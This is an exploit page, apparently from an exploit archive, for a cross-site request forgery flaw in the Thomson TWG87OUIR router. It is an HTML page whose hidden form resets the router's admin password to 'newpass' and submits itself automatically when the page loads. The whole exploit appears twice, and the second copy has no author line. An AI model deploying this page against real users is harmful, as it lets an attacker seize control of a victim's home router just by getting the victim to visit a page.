#Author: nopesled
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)
<html>
<head>
<title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
<form name="exploit" method="post"
action="http://192.168.0.1/goform/RgSecurity">
<input type="hidden" name="HttpUserId" value="" />
<input type="hidden" name="Password" value="newpass" />
<input type="hidden" name="PasswordReEnter" value="newpass" />
<input type="hidden" name="RestoreFactoryNo" value-="0x00" />
</form>
<script type="text/javascript">
document.exploit.submit();
</script>
</body>
</html>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
#Date: 24/06/14
#Vulnerability: POST Password Reset CSRF
#Tested on: Thomson TWG87OUIR (Hardware Version)
<html>
<head>
<title>Thomson TWG87OUIR CSRF</title>
</head>
<body>
<form name="exploit" method="post"
action="http://192.168.0.1/goform/RgSecurity">
<input type="hidden" name="HttpUserId" value="" />
<input type="hidden" name="Password" value="newpass" />
<input type="hidden" name="PasswordReEnter" value="newpass" />
<input type="hidden" name="RestoreFactoryNo" value-="0x00" />
</form>
<script type="text/javascript">
document.exploit.submit();
</script>
</body>
</html>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information